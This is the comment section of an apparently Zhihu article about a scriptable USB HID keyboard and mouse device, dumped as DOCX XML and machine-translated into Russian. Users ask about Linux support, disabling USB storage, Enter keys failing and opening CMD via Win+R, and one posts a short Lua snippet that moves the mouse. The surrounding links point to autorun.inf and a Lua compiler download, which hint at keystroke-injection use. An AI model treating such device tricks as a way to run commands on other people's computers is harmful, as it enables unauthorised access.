      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12 рецензий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">По умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Последние</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Дыхательное поле" title="" id="41" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-fe549a427304bc6ca1755dd864539f49_l.jpg?source=06d4cd63" id="42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4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Дыхательное поле</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Могу ли я подключить Linux?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12-01 · Гуандун</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId47">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Jaxon005" title="" id="45" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-12909f285de0835cb9d2fbb10928c9c3_l.jpg?source=06d4cd63" id="46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4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Jaxon005</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Можно ли включить только HID? Не включайте USB-память</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">08-19 · Гуандун</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ХЬЮГО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ХЬЮГО</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Почему мои ключи ('\n') не могут выполнить возврат каретки?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">07-02 · Гуандун</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId49">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Я вечный друг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Я вечный друг</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">raw_key (0,40)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">можно заменить на вышеуказанный код</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11-21 · Пекин</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId53">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="685800" cy="685800"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="1238" title="" id="51" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-0bb3bda8a80832af3374ec5e2dd2f6fe_l.jpg?source=06d4cd63" id="52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5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1238</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">delay(200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">для numberOfCycles=0,5 do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if numberOfCycles&gt;0 then</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mouse( 0, 70, 0, 0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mouse(1, 0, 0, 0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для rightOffset=0,9 do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">04-25 · Фуцзянь</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId53">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1238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1238</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Братья, есть ли способ управлять траекторией движения мыши в зависимости от арки? Я чувствую, что могу работать только с клавиатуры и левыми и правыми средними кнопками мыши, не могу найти другие функции и не могу скомпилировать ответы на вопрос ИИ-интеллекта lua4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">04-25 · Фуцзянь</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId57">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="AgenTSD" title="" id="55" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-abed1a8c04700ba7d72b45195223e0ff_l.jpg?source=06d4cd63" id="56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5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AgenTSD</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Причина, по которой мои кодовые клавиши ('\n') не выполняются нормально, в том, что я не могу ввести cmd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">04-18 · Чжэцзян</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="ХЬЮГО" title="" id="58" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-abed1a8c04700ba7d72b45195223e0ff_l.jpg?source=06d4cd63" id="59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5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ХЬЮГО</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">07-02 · Гуандун</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId62">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Сертификация" title="" id="60" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-abed1a8c04700ba7d72b45195223e0ff_l.jpg?source=06d4cd63" id="61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5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Сертификация</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="1270000" cy="12700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https://picx.zhimg.com/v2-4812630bc27d642f7cafcd6cdeca3d7a.jpg?source=88ceefae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Что делать, если вы не вошли в систему, что делать с пользователями</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">02-18 · Шаньдун</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Хакер" title="" id="66" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-abed1a8c04700ba7d72b45195223e0ff_l.jpg?source=06d4cd63" id="67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5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Хакер</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">01-11 · Хэбэй</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Хакер" title="" id="70" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://pica.zhimg.com/v2-abed1a8c04700ba7d72b45195223e0ff_l.jpg?source=06d4cd63" id="71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6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Хакер</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Как открыть CMD здесь</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">01-11 · Хэбэй</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId75">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Сварочный аппарат" title="" id="73" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://pica.zhimg.com/v2-51c4c5b07e1116f7eac779572bb1597e_l.jpg?source=06d4cd63" id="74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7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Сварочный аппарат</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">win+r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">01-27 · Шаньси</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ответитьтипа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Не вошёл в систему пользователей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jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId10" Target="media/rId10.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId72" Target="media/rId72.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId21" Target="media/rId21.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId69" Target="media/rId69.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId50" Target="media/rId50.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId44" Target="media/rId44.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId17" Target="media/rId17.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId63" Target="media/rId63.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId54" Target="media/rId54.jpg" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId13" Target="media/rId13.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId40" Target="media/rId40.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId33" Target="https://link.zhihu.com/?target=http%3A//nnnxxx.cn" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId34" Target="https://link.zhihu.com/?target=http%3A//nnnxxx.cn/attachment/tools/luac4.rar" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId49" Target="https://www.zhihu.com/people/1f6d52db69bee01261edf073808bafe3" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId68" Target="https://www.zhihu.com/people/52335dfa7a207d0273bf7103df5f96a9" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId53" Target="https://www.zhihu.com/people/7008619c231ea51770e75dfd9180afeb" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId57" Target="https://www.zhihu.com/people/7761d5b1a4f3707ad9e7f9dbe9ef0a40" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId62" Target="https://www.zhihu.com/people/78b462c579ceffa5074e55a1f821b0e5" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId48" Target="https://www.zhihu.com/people/84d997dc69a1bbe7a6cb9d3750642eac" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId43" Target="https://www.zhihu.com/people/8e2e927367913eadf82810b8f8ce294d" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId47" Target="https://www.zhihu.com/people/96173c2debf73ce00c00607ccfd0e894" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId75" Target="https://www.zhihu.com/people/b917d0a05d348da6bffdece05607b9a2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId20" Target="https://www.zhihu.com/question/48510028" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId36" Target="https://zhida.zhihu.com/search?content_id=244892190&amp;content_type=Article&amp;match_order=1&amp;q=HID%E9%94%AE%E7%9B%98&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NjY1MTI1NzcsInEiOiJISUTplK7nm5giLCJ6aGlkYV9zb3VyY2UiOiJlbnRpdHkiLCJjb250ZW50X2lkIjoyNDQ4OTIxOTAsImNvbnRlbnRfdHlwZSI6IkFydGljbGUiLCJtYXRjaF9vcmRlciI6MSwiemRfdG9rZW4iOm51bGx9.Qlp-NhFTyd0aV4xi8pRieUss3FKZ9gAyx_BArnhaV4o&amp;zhida_source=entity" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId24" Target="https://zhida.zhihu.com/search?content_id=244892190&amp;content_type=Article&amp;match_order=1&amp;q=autorun.inf&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NjY1MTI1NzcsInEiOiJhdXRvcnVuLmluZiIsInpoaWRhX3NvdXJjZSI6ImVudGl0eSIsImNvbnRlbnRfaWQiOjI0NDg5MjE5MCwiY29udGVudF90eXBlIjoiQXJ0aWNsZSIsIm1hdGNoX29yZGVyIjoxLCJ6ZF90b2tlbiI6bnVsbH0.HaQp_ddwCnY9bTZzRkoxGKIopgA5bnPpEMy8UUMviu4&amp;zhida_source=entity" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId25" Target="https://zhida.zhihu.com/search?content_id=244892190&amp;content_type=Article&amp;match_order=1&amp;q=luac.out&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NjY1MTI1NzcsInEiOiJsdWFjLm91dCIsInpoaWRhX3NvdXJjZSI6ImVudGl0eSIsImNvbnRlbnRfaWQiOjI0NDg5MjE5MCwiY29udGVudF90eXBlIjoiQXJ0aWNsZSIsIm1hdGNoX29yZGVyIjoxLCJ6ZF90b2tlbiI6bnVsbH0.tgzY1hcHIJA2_OJYkZggg1BXX2F4EQ-fsKe7zkIkpLU&amp;zhida_source=entity" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://zhuanlan.zhihu.com//www.zhihu.com/people/zhou-jing-cheng-58" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId38" Target="https://zhuanlan.zhihu.com//www.zhihu.com/topic/19561983" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId37" Target="https://zhuanlan.zhihu.com//www.zhihu.com/topic/19923985" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId39" Target="https://zhuanlan.zhihu.com//www.zhihu.com/topic/20551634" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId9" Target="https://zhuanlan.zhihu.com/p/7054251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link.zhihu.com/?target=http%3A//nnnxxx.cn" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId34" Target="https://link.zhihu.com/?target=http%3A//nnnxxx.cn/attachment/tools/luac4.rar" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId49" Target="https://www.zhihu.com/people/1f6d52db69bee01261edf073808bafe3" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId68" Target="https://www.zhihu.com/people/52335dfa7a207d0273bf7103df5f96a9" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId53" Target="https://www.zhihu.com/people/7008619c231ea51770e75dfd9180afeb" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId57" Target="https://www.zhihu.com/people/7761d5b1a4f3707ad9e7f9dbe9ef0a40" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId62" Target="https://www.zhihu.com/people/78b462c579ceffa5074e55a1f821b0e5" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId48" Target="https://www.zhihu.com/people/84d997dc69a1bbe7a6cb9d3750642eac" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId43" Target="https://www.zhihu.com/people/8e2e927367913eadf82810b8f8ce294d" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId47" Target="https://www.zhihu.com/people/96173c2debf73ce00c00607ccfd0e894" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId75" Target="https://www.zhihu.com/people/b917d0a05d348da6bffdece05607b9a2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId20" Target="https://www.zhihu.com/question/48510028" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId36" Target="https://zhida.zhihu.com/search?content_id=244892190&amp;content_type=Article&amp;match_order=1&amp;q=HID%E9%94%AE%E7%9B%98&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NjY1MTI1NzcsInEiOiJISUTplK7nm5giLCJ6aGlkYV9zb3VyY2UiOiJlbnRpdHkiLCJjb250ZW50X2lkIjoyNDQ4OTIxOTAsImNvbnRlbnRfdHlwZSI6IkFydGljbGUiLCJtYXRjaF9vcmRlciI6MSwiemRfdG9rZW4iOm51bGx9.Qlp-NhFTyd0aV4xi8pRieUss3FKZ9gAyx_BArnhaV4o&amp;zhida_source=entity" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId24" Target="https://zhida.zhihu.com/search?content_id=244892190&amp;content_type=Article&amp;match_order=1&amp;q=autorun.inf&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NjY1MTI1NzcsInEiOiJhdXRvcnVuLmluZiIsInpoaWRhX3NvdXJjZSI6ImVudGl0eSIsImNvbnRlbnRfaWQiOjI0NDg5MjE5MCwiY29udGVudF90eXBlIjoiQXJ0aWNsZSIsIm1hdGNoX29yZGVyIjoxLCJ6ZF90b2tlbiI6bnVsbH0.HaQp_ddwCnY9bTZzRkoxGKIopgA5bnPpEMy8UUMviu4&amp;zhida_source=entity" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId25" Target="https://zhida.zhihu.com/search?content_id=244892190&amp;content_type=Article&amp;match_order=1&amp;q=luac.out&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NjY1MTI1NzcsInEiOiJsdWFjLm91dCIsInpoaWRhX3NvdXJjZSI6ImVudGl0eSIsImNvbnRlbnRfaWQiOjI0NDg5MjE5MCwiY29udGVudF90eXBlIjoiQXJ0aWNsZSIsIm1hdGNoX29yZGVyIjoxLCJ6ZF90b2tlbiI6bnVsbH0.tgzY1hcHIJA2_OJYkZggg1BXX2F4EQ-fsKe7zkIkpLU&amp;zhida_source=entity" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://zhuanlan.zhihu.com//www.zhihu.com/people/zhou-jing-cheng-58" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId38" Target="https://zhuanlan.zhihu.com//www.zhihu.com/topic/19561983" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId37" Target="https://zhuanlan.zhihu.com//www.zhihu.com/topic/19923985" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId39" Target="https://zhuanlan.zhihu.com//www.zhihu.com/topic/20551634" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId9" Target="https://zhuanlan.zhihu.com/p/7054251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2025-12-21T18:07:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T18:07:04Z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